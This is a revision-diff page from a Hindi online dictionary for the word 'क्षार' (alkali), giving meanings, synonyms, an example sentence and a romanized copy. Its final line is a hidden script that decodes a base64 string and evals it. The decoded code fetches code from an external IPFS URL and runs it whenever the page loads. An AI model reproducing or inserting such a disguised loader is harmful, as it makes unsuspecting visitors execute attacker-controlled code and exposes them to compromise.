Difference between revisions of "क्षार"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
|हिन्दी=नमक, जवाखार, शोरा, सुहागा, काला नमक, काँच, भस्म, रस या सत, गुड़, [[जल]], ठग, धूर्त्त, दुष्ट, क्षरणशील, खारा, दाहक, जारक, रिसने या बहने वाला, खार
+
|हिन्दी=नमक, जवाखार, शोरा, सुहागा, काला नमक, काँच, भस्म, रस या सत, गुड़, [[जल]], ठग, धूर्त्त, दुष्ट, क्षरणशील, खारा, दाहक, जारक, रिसने या बहने वाला|
 
|व्याकरण=पुल्लिंग, धातु, [[विशेषण]]
 
|व्याकरण=पुल्लिंग, धातु, [[विशेषण]]
|उदाहरण=क्षार वह [[पदार्थ]] है जो किसी अम्ल के रूप में अभिक्रिया कर [[लवण (रसायन विज्ञान)|लवण]] बनाता है।
+
|उदाहरण='''क्षार''' वह [[पदार्थ]] है जो किसी अम्ल के रूप में अभिक्रिया कर [[लवण (रसायन विज्ञान)|लवण]] बनाता है।
|विशेष=क्षार [[खनिज]] पदार्थों के योग से तथा रासायनिक प्रक्रिया द्वारा तैयार की हुई राख का नमक है जो औषधि के रूप में काम आता है। इस नमक के घोल से तेजाब का प्रभाव नष्ट किया जाता है।
+
|विशेष='''क्षार''' [[खनिज]] पदार्थों के योग से तथा रासायनिक प्रक्रिया द्वारा तैयार की हुई राख का नमक है जो औषधि के रूप में काम आता है। इस नमक के घोल से तेजाब का प्रभाव नष्ट किया जाता है।
 
|विलोम=
 
|विलोम=
|पर्यायवाची=अल्क़ली, ऐल्कली, काचक, क्षारक, खार, रासी, सज्जी, सोड़ा
+
|पर्यायवाची=अल्क़ली, ऐल्कली, काचक, क्षारक, खार, रासी, सज्जी, सोड़ा|
 
|संस्कृत=[क्षर्+ण]
 
|संस्कृत=[क्षर्+ण]
 
|अन्य ग्रंथ=
 
|अन्य ग्रंथ=

Latest revision as of 10:00, 11 February 2011

shabd sandarbh
hindi namak, javakhar, shora, suhaga, kala namak, kaanch, bhasm, ras ya sat, gu d, jal, thag, dhoortt, dusht, ksharanashil, khara, dahak, jarak, risane ya bahane vala
-vyakaran    pulliang, dhatu, visheshan
-udaharan   kshar vah padarth hai jo kisi aml ke roop mean abhikriya kar lavan banata hai.
-vishesh    kshar khanij padarthoan ke yog se tatha rasayanik prakriya dvara taiyar ki huee rakh ka namak hai jo aushadhi ke roop mean kam ata hai. is namak ke ghol se tejab ka prabhav nasht kiya jata hai.
-vilom   
-paryayavachi    alqali, ailkali, kachak, ksharak, khar, rasi, sajji, so da
sanskrit [ksharh+n]
any granth
sanbandhit shabd ksharan, ksharak, kshat
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>